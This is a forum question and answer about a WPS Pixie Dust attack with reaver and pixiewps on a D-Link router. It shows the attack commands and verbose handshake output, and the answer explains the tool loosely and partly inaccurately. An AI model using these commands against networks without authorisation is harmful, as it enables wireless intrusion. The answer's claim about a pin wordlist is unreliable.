# WPS Pixie atack: WPS pin not found and exit after seconf trial

Tags: wireless-networking, security, wps

I use reaver for test my network for pixie vulnerability.
After run the command:

reaver -i wlan0mon -b 60:E3:27:BC:11:84 -c 4 -vvv -K 1 -f

I have follow output:

```
[+] Switching wlan0mon to channel 6
[?] Restore previous session for 00:24:01:18:B6:17? [n/Y] y
[+] p1_index set to 13
[+] p2_index set to 0
[+] Restored previous session
[+] Waiting for beacon from 00:24:01:18:B6:17
[+] Associated with 00:24:01:18:B6:17 (ESSID: Root)
[+] Starting Cracking Session. Pin count: 13, Max pin attempts: 11000
[+] Trying pin 00025676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 55:73:96:e3:13:ad:fd:87:43:a8:8d:b9:fb:04:aa:5c
[P] PKE: bd:9d:2f:9b:dd:83:9a:f2:c0:32:e0:be:ac:9e:1b:db:f8:b4:f3:6e:9f:59:9c:72:b7:e5:ac:32:8c:bc:7e:0c:93:a2:cd:98:9e:83:cc:ef:b2:10:65:fe:e4:af:46:20:fa:23:a5:6e:33:a6:27:2a:52:6b:1d:95:46:5e:c1:c3:40:60:3e:5c:1f:06:75:dc:65:07:aa:43:1c:08:73:79:6f:7f:3c:07:ee:b8:d4:87:6b:41:05:8a:55:ab:6e:1e:8e:24:9f:ed:4d:1e:b5:14:5a:71:70:1d:d4:2a:36:1d:14:66:6c:55:79:56:25:24:f4:47:15:52:ef:3a:9b:25:48:ee:31:5b:38:e9:39:26:80:98:77:1a:56:9f:48:00:be:e4:61:48:17:2e:35:7a:ab:b6:1c:61:a6:ec:f3:c9:a5:40:7e:72:23:6b:3a:76:1e:3e:ad:71:3f:5a:cd:00:ce:f3:9d:56:d0:e6:58:c2:58:56:0a:13:ba:71:b1:12
[P] WPS Manufacturer: D-Link
[P] WPS Model Name: DIR-300
[P] WPS Model Number: DIR-300
[P] Access Point Serial Number: 00000000
[+] Received M1 message
[P] R-Nonce: 52:08:ee:18:14:75:46:50:ee:0b:08:15:fa:c4:21:8a
[P] PKR: b3:d3:4f:a8:0b:3f:ca:03:4c:04:30:27:fe:7e:08:07:c7:5e:5e:9d:a4:04:11:2c:03:9f:f4:1f:b1:52:48:20:4e:dc:02:a6:2f:20:32:d8:de:08:d9:2c:c1:73:81:87:86:6d:b7:62:bc:b3:6d:b9:6d:91:f8:50:98:03:e3:bd:52:e5:e3:a7:8c:46:e2:ea:94:68:48:e8:8c:62:09:b9:28:a8:e0:5f:e3:94:63:b8:05:16:e6:c8:ec:e6:bc:8b:9a:dc:df:18:40:55:61:cb:db:fa:d7:45:37:67:d3:27:d3:6a:03:3d:95:f8:b5:b5:22:ab:a0:9b:fd:d6:55:f6:8f:03:18:f2:8b:33:ac:9f:eb:06:45:c9:07:2d:ac:0b:98:c4:f0:62:78:b2:0a:8c:5e:db:22:d3:39:97:4e:1c:9e:bc:db:11:97:49:91:2e:bd:d2:7f:0a:cb:63:6e:59:bb:f0:08:c8:2d:64:d9:bb:9e:e8:ba:09:6e:14:13:27
[P] AuthKey: 69:59:ae:9a:f2:f1:22:68:d7:ca:c5:c1:7b:6b:ca:92:cf:71:73:fb:c4:f7:5a:e2:11:3b:2f:6c:df:be:06:56
[+] Sending M2 message
[P] E-Hash1: c0:dd:92:28:af:b6:53:d5:90:aa:71:fd:98:1a:f2:91:dd:a0:74:67:2b:3b:a4:ca:c3:68:9a:8b:11:d3:f5:b6
[P] E-Hash2: 31:b0:7f:1d:c2:07:4f:28:e1:12:05:fc:85:10:26:a9:79:96:dc:b0:b8:02:d2:30:43:ef:df:24:94:d1:51:0f
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s 157 ms
[Pixie-Dust]  
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]
```

It exits directly after first "Pin not found". Is it OK?
Or I misdid something?

Answer (score 0):

It is perfectly fine if the pin is not found. Reaver has a set of pins which it uses to brute-force the WPS Pin and the sometimes the pin of the router is not present in the wordlist. However I would recommend you to try the attack a few more times as Reaver has the tendency to overlook the pin. You can also try the full bruteforce method, but this can take few hours depending on the difficulty of the pin. You can also specify the pin if it is known by using the code

```
reaver -i wlan0mon -b 60:E3:27:BC:11:84 -c 4 -vvv -K 1 -p (Pin)
```